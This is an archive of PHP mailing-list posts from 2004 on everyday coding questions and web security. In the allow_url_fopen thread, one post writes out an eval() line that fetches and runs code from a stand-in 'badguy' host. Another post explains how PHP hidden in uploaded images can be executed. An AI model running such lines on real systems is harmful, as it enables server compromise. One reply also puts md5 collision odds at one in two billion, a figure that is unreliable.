--- Ford, Mike [EMAIL PROTECTED] wrote: Lastly, I wasn't concerned about the hex code, but I just made some reconnections of scripts. Users can save their search parameters. I am saving the query string. Now I had this set up before and the way it was working , is when the user wanted to view or edit their saved searches, the search page would come back with all the parameters filled in including shaded parameters in things like multi select lists and menu dropdowns. It's not working that way now so my first suspicion is perhaps the hex is effecting it. I'm not sure if this particular is a matter of debugging. There is a different behaviour going on and now I'm not sure if it would have anything to with the hex. The textfields in the query string are just the variable name = value. Basically I'm throwing this out though since I'm wondering if there is something that should be in the search script , that when I apply a query string to it would fill in the field (like magic hands) As an example, if you click on the link , you'll see industry has 2 choices selected , and city has a value. Now I can't reproduce this with my new script. http://www.lurkingforwork.com/LFWSearch.php?s_Industry[]=2s_Industry[]=3s_LocationCity=Bronxs_JobTitle=s_PostStart=VendorJobsPageSize= Stuart -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] MYSQL Query question
John Nichel wrote: Raditha Dissanayake wrote: Reinhart Viane wrote: And a last question: I always seem to get stuck on mysql queries when scripting. mysql.com gives me a headache whens earching something. Does someone know a good mysql manual site or a good mysql book? That does not mean mysql questions should be posted on php mailing lists. snip There you go again, trying to keep this list on topic. ;) Alright I am going to change. as they say if you can't beat them join them. obligatory off topic post: Do you think it's better to use innodb type tables or myisam type tables when using mysql even without foreign keys? -- Raditha Dissanayake. -- http://www.radinks.com/print/card-designer/ | Card Designer Applet http://www.radinks.com/upload/ | Drag and Drop Upload -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Finding the location of an included script
Is this possible? I'm trying to write a back end to be used in most of my websites. While I can simply use symlinks to ensure this is included from my various sites but only exists once on the hardrive, I'd prefer to simply include the file and have the script itself work out where it lives. So if I have: include(/path/to/backend.php); Is there a way from inside of backend.php to return /path/to ? Gadi -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Question:maybe urldecode
On Thursday 09 December 2004 23:16, Stuart Felenstein wrote: I'm not sure if this particular is a matter of debugging. Your program doesn't work the way you intended it? So if you don't debug it, how is it going to get from a not working as intended state, to a working state? There is a different behaviour going on and now I'm not sure if it would have anything to with the hex. The textfields in the query string are just the variable name = value. So what do the variables contain at each stage? Where do they change from what you expected to not what you expected?. Basically I'm throwing this out though since I'm wondering if there is something that should be in the search script , that when I apply a query string to it would fill in the field (like magic hands) Yeah I wish I had some magic hands that writes my programs for me too. Sadly ... -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* The days are all empty and the nights are unreal. */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Question:maybe urldecode
--- Jason Wong [EMAIL PROTECTED] wrote: Basically I'm throwing this out though since I'm wondering if there is something that should be in the search script , that when I apply a query string to it would fill in the field (like magic hands) Yeah I wish I had some magic hands that writes my programs for me too. Sadly ... Jason, I don't think you read or understood my question. As I said, it doesn't seem to be a debugging scenario.I was asking if anyone would know a reason why on one page , one could apply the query string to url and the page would be filled in and another page it doesnt work. Please don't imply I'm looking for someone to write my programs. The magic hands was a reference to how the boxes are filled in by placing the string in. Stuart -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Finding the location of an included script
Gadi Cohen wrote: So if I have: include(/path/to/backend.php); Is there a way from inside of backend.php to return /path/to ? Check out the filesystem functions in the PHP manual. You're probably particularly interested in pathinfo() http://www.php.net/pathinfo -- Ben Ramsey Zend Certified Engineer http://benramsey.com --- Atlanta PHP - http://www.atlphp.org/ The Southeast's premier PHP community. --- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] a question about the PHP manual
Eakin, W wrote: Hello, As I'm studying, and learning, PHP, I use certain resources again and again. A few books I've bought, some web sites, this mailing list, and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I attempt to google or RTFM before considering a post to the list with a question, but now I have a question about the manual itself. I've noticed that most of the replies to the questions on this list, when they refer to a part of the manual, point to the same few sections over and over. Such as arrays, strings, sessions, objects, and a few others. My question is this, when I'm reading the manual, is just that I should be concentrating on a few sections (and if so, which?), or should I be giving equal attention to all the sections, including some (I suppose) I might never use. I would recommend reading EVERYTHING in the PHP manual UP TO Section VI: Function Reference All of that stuff is what defines the core PHP Language, and if you don't know it, you're going to waste a lot of time on Voodoo Programming. Voodoo Programming: You do things that work but you have completely erroneous beliefs about *why* and *how* they work. If you know the jargon for what you are looking for, Google is your buddy; But if you don't, and can only describe what you want in a paragraph of a question, then re-read all of that, plus the FAQs. You then want to skim through the main page of each function reference section. Currently that's 135 (!) pages. Some of them you can quickly dismiss as irrelevant for all time to me :-) Others, you'll find out that there's an entire science to something you thought you'd have to invent for yourself. Yes, that's a lot of reading. No, you won't remember all of it. Hell, you might not even understand all of it when you read it. Once upon a time, I even posted an FAQ to the list, way back when, because while I had *read* the FAQ initially, there were FAQs I didn't even understand the Question to, much less the Answer. Six months later, of course, I ran into the question in my own needs, and, well, didn't *RE*-read the FAQ. Take note of the stuff you don't understand at all, and try to memorize the buzz-words or what you think they might be all about. The hair you save may be your own. :-) -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] best practice question..
Guy Bowden wrote: On this note - what is considered best practice in a - sent to friend type thing. i.e. User inputs their name + message + email + friends email into a html/flash form friend gets a link to read the message. currently I do this: 1 collect form input 2 create hash using the md5/uniqid method : $hash = md5(uniqid($key)); 3 input data to database table using the hash as the primary key value 4 send email to friend with link containing the hash 5 user clicks on link 6 hash read in from the $_GET object 7 hash used to select message details from DB and displayed to the user There's never a security issue here - i.e. i don't mind how many times / who reads the message, but just want to make it hard to just guess keys to read other messages (otherwise it would just be the db id) This method works for me, but is it the *right* way? I would also: Track the sender IP address, and only allow N sends per time period T. Track the recipient email, and only allow M To:s per time period U. The point being to stop spammers from using your system to spam the world, or target specific victims. Is $key the ID in the database? You may want to consider adding in more randomness with mt_rand() as the manual suggests on the uniqid page -- You can still keep $key as part of the hash by doing: md5(uniqid($key| . mt_rand(), true)) Certainly sending the md5/uniquid as the only thing exposed is about as good as you can get for making sure that the other email URLs are guessable -- You do run the risk that sooner or later your md5/uniquid hash will collide with two emails on the same value. Easy enough to check the db and generate another hash if they do collide, so I'd add that in if you don't have it. Add a line after your md5(...) call and set $hash = '42' for testing purpose, then comment it out to go back to reality. You could look into the larger bits and longer hashes that would be better but I really don't think that's necessary, imho. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] duplicate md5 hash's
GB Is there any way that the same hash could have been generated more than GB once? It's extremely unlikely (I cannot give you any stats as to how unlikely though, sorry). As I understand it (or don't, rather) the odds are one in 2,147,...,... (2 billion) But that's only in theory. In practice, I think people have demonstrated that it's not really 1 in 2 billion. It's still damned unlikely, but making *SURE* with the loop you've got is cheap and easy, so I'd stick with that. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] a question about the PHP manual
Hi, Richard is spot on, but learning (PHP, ASP, Java, ...) programming is not all about reading. Set up small examples that better enforce the ideas in your mind about specific topics that you are having a hard time with. You will loose, roughly, 90% of the information by just reading. Examples help solidify the theories. Regards, Justin Palmer __ KISS (Keep It Simple, SEARCH)! Google::getUri( http://www.google.com ); Archives::getUri( http://marc.theaimsgroup.com/?l=php-general ); -Original Message- From: Richard Lynch [mailto:[EMAIL PROTECTED] Sent: Thursday, December 09, 2004 9:15 AM To: Eakin, W Cc: [EMAIL PROTECTED] Subject: Re: [PHP] a question about the PHP manual Eakin, W wrote: Hello, As I'm studying, and learning, PHP, I use certain resources again and again. A few books I've bought, some web sites, this mailing list, and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I attempt to google or RTFM before considering a post to the list with a question, but now I have a question about the manual itself. I've noticed that most of the replies to the questions on this list, when they refer to a part of the manual, point to the same few sections over and over. Such as arrays, strings, sessions, objects, and a few others. My question is this, when I'm reading the manual, is just that I should be concentrating on a few sections (and if so, which?), or should I be giving equal attention to all the sections, including some (I suppose) I might never use. I would recommend reading EVERYTHING in the PHP manual UP TO Section VI: Function Reference All of that stuff is what defines the core PHP Language, and if you don't know it, you're going to waste a lot of time on Voodoo Programming. Voodoo Programming: You do things that work but you have completely erroneous beliefs about *why* and *how* they work. If you know the jargon for what you are looking for, Google is your buddy; But if you don't, and can only describe what you want in a paragraph of a question, then re-read all of that, plus the FAQs. You then want to skim through the main page of each function reference section. Currently that's 135 (!) pages. Some of them you can quickly dismiss as irrelevant for all time to me :-) Others, you'll find out that there's an entire science to something you thought you'd have to invent for yourself. Yes, that's a lot of reading. No, you won't remember all of it. Hell, you might not even understand all of it when you read it. Once upon a time, I even posted an FAQ to the list, way back when, because while I had *read* the FAQ initially, there were FAQs I didn't even understand the Question to, much less the Answer. Six months later, of course, I ran into the question in my own needs, and, well, didn't *RE*-read the FAQ. Take note of the stuff you don't understand at all, and try to memorize the buzz-words or what you think they might be all about. The hair you save may be your own. :-) -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Question: urldecode
Stuart Felenstein wrote: In my search page, the url returned comes back with the ..err I forget what it's called, but query string looks like this: %5B%5D=3. I think the %5B and 5D should be []. What I think is needed is rawurldecode. I've looked through my code and think it belongs somewhere in this block: Don't guess. Figure out *EXACTLY* where and when the URL is being encoded to Hex -- where it first appears in your scripts/database/application as %5B. Decide if it's right for it to be in Hex at that point. If it's not right for it to be Hex at that point, change it there. You'll drive yourself crazy changing it here, where it's already in the system in a format you don't want. My *GUESS* is that you're taking the QUERY string and stuffing it into your database. Since you grab the raw query string, it's in Hex-encoded format. Maybe that's a Good Thing to store in your database. Maybe it's not. All depends what you're going to do with it in the *REST* of the application. But I cannot stress enough that you've got to understand where and how this data is coming from, in what format, and *DESIGN* your application to have the data you want in the place you want. Going about it like you are now, just sort of guessing at what's there and trying to slap in a patch to change it, is going to drive you crazy in the long run. Your solution isn't necessarily wrong: Your approach to making the decision is :-) -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Question:maybe urldecode
On Friday 10 December 2004 00:24, Stuart Felenstein wrote: Jason, I don't think you read or understood my question. sigh As I said, it doesn't seem to be a debugging scenario.I was asking if anyone would know a reason why on one page , one could apply the query string to url and the page would be filled in and another page it doesnt work. The obvious (and banal) answer is that the pages are different. Find out what the significant differences are. How? If you are a genius you could do that with your eyes closed just by comparing the source. If you are stupid like I am then you would have to go through the tedious task of examining the contents of the variables and figure out what the heck is happening. -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* Q: What is printed on the bottom of beer bottles in Minnesota? A: Open other end. */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] allow_url_fopen ini directive not enough
Kelvin Jones wrote:
I would like to see a new directive to go alongside allow_url_fopen to
allow people to turn on or off the ability to include/require a remote
file.
The ability to include and execute a file as php from a remote host
leaves many applications open to cross-site-scripting attacks.
This would be easily avoidable if we had a directive
(allow_url_include?) that by default removed this capability.
Seems kinda pointless to me...
If a Progammer is dumb enough to include/require untrusted source code,
they can just as easily do:
eval(implode('', file('http://example.com/badguy.php')));
after you've turned OFF allow_url_include but left allow_url_fopen ON
If an attacker is managing to alter your PHP source to pull in his remote
PHP, then the remote PHP feature isn't really all that crucial -- It's
more convenient for them to suck it in from their remote server, perhaps,
or maybe they are worming through a database field that is too short to
hold all their source, so they shove in an include -- Still, *any* PHP
code they can execute will eventually give them control anyway.
If an attacker gains access to remote trusted source and replaces it,
then your decision to trust that source was faulty -- Which is neither
helped nor hindered by the remote include function, really. If you needed
that source, you can find a way to get it and have PHP evaluate it, unless
you disable all remote file access completely... Even then, a cron job to
snag it with wget, and an include, and you're back at Square One.
I guess I'm saying that only education and diligence by programmers is
going to avoid this attack. Turning off only the remote include, but not
remote fopen, won't stop anybody with half a clue for more than 30
seconds.
This is just my take on it, and there could easily be subtle issues or
known exploits you are trying to squash of which I know nothing.
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Unsubscribing Junk Emails From the List: requests@firstustrading.com
Hi, Every time I send a response to the list I get a auto-reply from: [EMAIL PROTECTED] Is there someone that I could email that can delete this user from the list? Thanks for any information. Regards, Justin Palmer __ KISS (Keep It Simple, SEARCH)! Google::getUri( http://www.google.com ); Archives::getUri( http://marc.theaimsgroup.com/?l=php-general ); -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Finding the location of an included script
On Thursday 09 December 2004 22:46, Gadi Cohen wrote: So if I have: include(/path/to/backend.php); Is there a way from inside of backend.php to return /path/to ? echo __FILE__; -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* I have never let my schooling interfere with my education. -- Mark Twain */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP4 mysqli with mysql 4.1.7?
Francis Mak wrote: mysqli_query($c, SET CHARACTER SET utf8;); The naive user, who understands *NOTHING* about i18l (?) functions, character sets, or anything other than American English (and not all that up on the esoterics of grammar in that) asks: What happens in your application if you just do: mysql_query(SET CHARACTER SET utf8, $connection) or die(mysql_error()); right after you connect to the database? In an ideal world, you've told MySQL to use utf8, and that would be that. Yeah, right. Worth a try, since it will take you 5 seconds, and *might* just work You may want to repeat your question on the PHP International list, if that's still going. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] help me split chars w/o spaces by 2... like: 2004
I did something like this a while back, I believe I used chunk_split
[code]
?
$year_split = date(Y);
$chars = chunk_split($year_split,2);
print_r($chars);
?
[/code]
it'll output something along the lines of:
20
04
Hope this helps,
--
Jasper Howard - Database Administration
ApexEleven.com
530 559 0107
---
On Thu, 9 Dec 2004 10:21:49 +0800, Louie Miranda [EMAIL PROTECTED] wrote:
?php
$hello2 = chop($year_split);
echo $hello2;
?
outputs: 2004
Whats the correct syntax for it? The manual said..
This function is an alias of rtrim().
and:
rtrim
(PHP 3, PHP 4 )
rtrim -- Strip whitespace from the end of a string
On Wed, 08 Dec 2004 18:11:19 -0800, Tyler Replogle [EMAIL PROTECTED] wrote:
have you tride using chop() ?
# begin code
$year_split = date(Y);
$chars = chop($year_split);
$chars[0] // = 2
$chars[1] // = 0
$chars[2] // = 0
$chars[3] //= 4
# end code
I hope that will help
From: Louie Miranda [EMAIL PROTECTED]
Reply-To: Louie Miranda [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: [PHP] help me split chars w/o spaces by 2... like: 2004
Date: Thu, 9 Dec 2004 09:55:57 +0800
MIME-Version: 1.0
Received: from pb1.pair.com ([216.92.131.4]) by mc6-f24.hotmail.com with
Microsoft SMTPSVC(5.0.2195.6713); Wed, 8 Dec 2004 17:56:52 -0800
Received: (qmail 21242 invoked by uid 1010); 9 Dec 2004 01:56:02 -
Received: (qmail 21150 invoked by uid 1010); 9 Dec 2004 01:56:01 -
X-Message-Info: 6sSXyD95QpUKIecQn+Z/xIP21pcg8LTu
Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
Precedence: bulk
list-help: mailto:[EMAIL PROTECTED]
list-unsubscribe: mailto:[EMAIL PROTECTED]
list-post: mailto:[EMAIL PROTECTED]
Delivered-To: mailing list [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;s=beta;
d=gmail.com;
h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding;
b=gp2OcpYqK7wZkSMBhO5OvxdTzhTOQdM1+n9ZtLJ4lmsKWFpVRb9Y2kyjNIrRIX/rvXeFfwCVGh7LT6kub0DMmCGdeRiLKeCjJkxK4fWxSrP2D+FexciD2lT8ASKD7TNYC3YGIZLZbk5UEJIq9Yx2TkbIdgNd/Op3+iEviy1scI4=
Return-Path: [EMAIL PROTECTED]
X-OriginalArrivalTime: 09 Dec 2004 01:56:53.0406 (UTC)
FILETIME=[5AF313E0:01C4DD92]
Help me split chars w/o spaces by 2... like: 2004
How can i make it?
first: 20
second: 04
Im working on this..
# begin code
$year_split = date(Y);
$chars = preg_split('//', $year_split, -1, PREG_SPLIT_NO_EMPTY);
# end code
But it splits the whole 2004 string..
Array
(
[0] = 2
[1] = 0
[2] = 0
[3] = 4
)
--
Louie Miranda
http://www.axishift.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
Louie Miranda
http://www.axishift.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
Jasper Howard - Database Administration
ApexEleven.com
530 559 0107
---
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Confused - $GLOBALS
Below is a snip of a program I am writing, I am a little new to php.
Any how, I can't for the life me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in a if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.
if (array_key_exists('pictures', $_POST)) {
$how_many_pics = $_POST['pictures'];
picture_input($how_many_pics);
//process_errors();
$k = '1';
while ($k = $how_many_pics) {
$item_pics1 .= td align=\center\A HREF=\pics/full_$k.jpg
\ onMouseOver=\hiLite3('img03','clickme5')\;
$item_pics1 .= img src=\pics/thumb_$k.jpg\ border=\0
\/td;
$k++;
}
html_form($title, $price, $descrip, $current_items,
$title_file_name, $errors);
} else {
print 'form method=post action=add-item.php';
print 'trtdHow Many pictures do you have?: /tdtdinput
type=text name=pictures size=2/td/tr';
print '/form';
}
function html_template() {
if (file_exists('item.html')) {
$html_template = $GLOBALS['html_template'];
$html_template = str_replace('{pictures2}',
$GLOBALS['item_pics1'], $html_template);
$html_template = str_replace('{title}', $GLOBALS['title'],
$html_template);
$html_template = str_replace('{description}',
$GLOBALS['descrip'], $html_template);
$html_template = str_replace('{price}', $GLOBALS['price'],
$html_template);
$item_file_name = $GLOBALS['root_dir'] . / . $GLOBALS['dir'] .
/item.html;
$item_fh = fopen($item_file_name, 'x+');
fwrite($item_fh, $html_template);
} else {
$GLOBALS['errors'] .= item.html template does not exsit;
}
}
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] about installing php
satya bharti wrote: sir, I am using Red Hat Linux 8.0, and tried many times to install apache 2.0 and php4.0 many times, the message comes that apache and php has installed on my system. when i execute a php program through my web brouser it shows blank. what causes this and how can I solve this problem? plz help on this matter. Any time a PHP page shows blank, you should use your browser's View Source menu to see what's *REALLY* in there. It can help you understand what is going on most of the time. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] login.php
badlya badlu wrote: This is my first mail to php mailing list. i want to create one login.php program in linux. i want this page to go the ldap server for authentication. how should i do it. http://php.net/ldap You may also want to just use somebody else's LDAP PHP script. I'm betting you could find one at http://phpclasses.org or just Google for LDAP PHP One thing for sure: The mailing list community isn't going to just write the code for you and post it here. :-) -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Close all open tags in HTML text
Matt Palermo wrote: I am allowing users to imput HTML code into a textarea. After they input this, I wany to output their HTML to the browser. In order for the document to be safe, I need to close all open HTML tags that have been left open by the user, along with any open comments. Is there a way to take an HTML string and add closing tags and comments to it if needed? After you use http://php.net/tidy to fix the HTML, use http://php.net/strip_tags to rip out all but the handful of tags you really want to allow them to use, most especially any JavaScript they might shove in to attack your (and my!) server. I *think* strip_tags rips out JavaScript. RTFM to be sure. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Question:maybe urldecode
--- Richard Lynch [EMAIL PROTECTED] wrote: Then your new script is broken, as clearly the GET paramters *ARE* there. Sorry, I'm not following you. Where are my GET parameters ? The way I've built my present script is the reults page is grabbing the parameters. Do I need to set up GET parameters in the first/search page ? Is the new script on a different server or in a different directory? Perhaps with register_globals turned OFF? No , same server, The new scripts are in a different directory then the previous one. They are not related or call to each other.Register_globals are set to ON. Stuart -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
Danny Brow wrote:
Below is a snip of a program I am writing, I am a little new to php.
Any how, I can't for the life me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in a if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.
snip
If you want to use a variable from outside the function, you either have
to pass it to the function; if you want to change it, you have to pass
it by reference, or make it global inside the function
function foo ( $bar ) {
/--code--/
}
function foo ( $bar ) {
/--code--/
}
function foo() {
global $var;
/--more code--/
}
I may be mistaken, but I think the $GLOBALS array was introduced in 4.3.0.
http://us4.php.net/manual/en/language.variables.scope.php
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
Belay that...the $GLOBALS array has existed since PHP3 -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Object In Object
Hi,
Is this a good way ?
?
class main{
var $mysql;
var $user;
function main(){
$this-mysql=new mysql();
$this-user=new user();
}
}
class Mysql
{
function x(){ return Some Query Result for ;}
}
class user
{
var $username;
function user(){$this-username=Guest;}
}
/* Other subclasses */
class Data extends main{
function getText(){
echo $this-mysql-x();
echo $this-user-username;
}
}
$class=new main();
$data=new Data();
$data-getText();
?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Unsubscribing Junk Emails From the List: requests@firstustrading.com
I'm getting it too. On Thu, 2004-12-09 at 09:49 -0800, Justin Palmer wrote: Hi, Every time I send a response to the list I get a auto-reply from: [EMAIL PROTECTED] Is there someone that I could email that can delete this user from the list? Thanks for any information. Regards, Justin Palmer __ KISS (Keep It Simple, SEARCH)! Google::getUri( http://www.google.com ); Archives::getUri( http://marc.theaimsgroup.com/?l=php-general ); -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
On Thu, 2004-12-09 at 13:41 -0500, John Nichel wrote:
Danny Brow wrote:
Below is a snip of a program I am writing, I am a little new to php.
Any how, I can't for the life me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in a if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.
snip
If you want to use a variable from outside the function, you either have
to pass it to the function; if you want to change it, you have to pass
it by reference, or make it global inside the function
function foo ( $bar ) {
/--code--/
}
function foo ( $bar ) {
/--code--/
}
function foo() {
global $var;
/--more code--/
}
See this is where the confusion is, I've tried all these and it still
does not work. I'm going to read the whole page on variable scope a few
times, see if I missed something. Maybe it's something else in my code
screwing my up.
Thanks.
Dan.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Object In Object
* Dinçer akay [EMAIL PROTECTED]:
Is this a good way ?
?
class main{
var $mysql;
var $user;
function main(){
$this-mysql=new mysql();
$this-user=new user();
If you're developing strictly for PHP5, this will work fine. However, if
you're in PHP4, you're going to want to use references. Try the
following:
$mysql = new mysql();
$this-mysql = $mysql;
$user= new user();
$this-user = $user;
Other than that, yes, this is a fairly standard mechanism in PHP's OOP.
--
Matthew Weier O'Phinney | mailto:[EMAIL PROTECTED]
Webmaster and IT Specialist | http://www.garden.org
National Gardening Association| http://www.kidsgardening.com
802-863-5251 x156 | http://nationalgardenmonth.org
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: PHP Security
Also, you *SHOULD* force the file to be saved on your server
with the correct extension. If a user can upload a JPEG with
.php on the end, or worse, with php in the middle of the
filename, and then your server puts that file in the web tree or
otherwise allows it to be executed, *YOU* (and your server
admin) screwed up your security, not PHP.
Trusting the name provided by the client is certainly a bad practice, but
I wouldn't consider php in the middle of a filename to be worse than
extension manipulation. I'm not sure what gave you that idea, but it's
just not true.
The original article, in another newsgroup/list, referenced a server seen
by that author, where the SysAdmin had configured the server to use PHP to
parse any file whose name contained 'php'.
Not ending in '.php' ('.php$')
Nor even ending in 'php' ('php$')
But containing 'php' ('.*php.*').
phplogo.jpg, when surfed to, went through PHP.
Real-life problem.
Yes, that's a horribly-configured server.
No, I don't think you'd have that on your server.
But I'd bet at least one reader on this list misunderstands the Apache
Files directive (with and without the ~) badly enough that they've got
this gaping hole on their server.
Now combine that with putting uploaded JPEGs in the web tree, and what
have you got?
My grammar in my post incorrectly put the 'or worse' near 'php in the
middle' when it should have been near 'your server ... allows it to be
executed'
The real culprit, is, of course, the mis-configured server.
But it takes two to tango, here, and throwing the JPEGs in the web tree
should not be done unless you *NEED* to do that, for performance, after
due consideration and a security audit to be *SURE* that the JPEGs cannot
ever possibly get executed as PHP.
Under *NO* circumstances should a file uploaded by an
untrusted user be put into your web tree. You should *KEEP* it
outside the web tree, and use PHP to http://php.net/readfile it
when it needs to be displayed. Since you are using PHP's
readfile function to *READ* the file, Apache won't have any
chance to get fooled into thinking it's supposed to be a PHP file
and be parsed by PHP.
This is misleading. It is fine to put uploaded files within document root,
and in fact many applications may require this. Using readfile() is not
realistic except for small sites - the performance penalty alone makes
this a poor approach, since it provides very little value.
That being said, it's true that you should not trust the name provided by
the client (or anything provided by the client), but this is much
different than blind paranoia. If this perspective were applied to HTML
forms, no one could use them.
You don't take raw data from HTML forms and save the field values into
your web tree do you?
You scrub the incoming data from the web form and make sure, as much as
possible for the given field, that it is benign, right? And you certainly
don't http://php.net/eval that untrusted data from a user, do you?
Then why in the world would you take an untrusted, unscrubbable, binary
file and shove it into your web-tree?!
Can you be 100% certain that ?php /* bad code here */ ? is not embedded
in the JPEG? How? getimagesize() will tell you the JPEG headers are
kosher, but not confirm that the JPEG itself is really really just JPEG
data.
Even viewing it would only, at best, show you an ugly JPEG.
You could egrep for ?php.*?, and assume that that's not valid in any
JPEG, but it probably actually *IS* valid in at least one real JPEG -- And
if you allow JPEG comments, it would be trivial to have a zillion JPEGs
that would pass any automated validation of JPEG-ness that have PHP code
in the comment.
What's to stop the bad guy from taking a valid JPEG, cramming PHP code
into it, and then surfing to the image directly in such a way that the PHP
code gets executed?
Sure, your server configuration almost for sure doesn't have .jpg files
going through the PHP parser. But if they can find a way to force that to
happen:
Altering an .htaccess file somewhere, or forcing one to be uploaded.
Finding an old cgi-bin setup on the server.
Getting the CLI PHP to execute the JPG as a script.
It's hard to imagine that last one without them being able to just TYPE a
PHP script, mind you, but some whack 'sudo' setup might do it. Think
every SysAdmin who uses sudo really understands sudo completely?
Hopefully, none of these things can be done on your server. If you are
100% certain that none of these could ever possibly occur, then you are
confident that the JPEGs with PHP embedded will only be ugly JPEGs.
But if there is any doubt in your mind that a malicious user could manage
to get the JPEG to be passed through PHP (or Perl or ...) then you've got
a risk there that may not be obvious to the casual
Reader/Sysadmin/Programmer.
Busy servers may have a performance problem with using the readfile
solution -- But that's no excuse to expose that busy server by just
throwing an
Re: [PHP] PHP Security
There are better ways to do this than parsing .jpg files as PHP. One obvious one is: http://example.org/image.php/foo.jpg I believe this broke on a very very very obscure version of IE -- Maybe even the re-branded IE I ran into one time [shudder]. In theory, it was just IE X.xx.yy, but it turned out to be *different* for some case involving rich media. I cannot for the life of me find the references from my day job four times removed to prove it, mind you, and maybe it was with PDF and not JPEG, but at some point, I just don't want to give browsers (or search engines) *ANY* realistic opportunity to spot .php and decide that my dynamic image is inferior/invalid. Another one that I've seen referenced frequently (especially back when this was a larger and more common problem) is this: http://example.org/image.php?iesucks=foo.jpg In the larger picture of rich media in general, this will fail miserable for dynamic PDFs. If I have to dink around with PATH_INFO for PDFs to behave, I might as well treat my JPEGs with the same code-base and use: http://example.com/image/iesucks/foo.jpg http://example.com/pdf/iesucks/foo.pdf Too many browsers, too many bugs == I'm not letting them waste my time any more on their stupidity. I wouldn't recommend that users configure servers to parse *ALL* *.jpg in a directory as PHP, of course. Ditto for 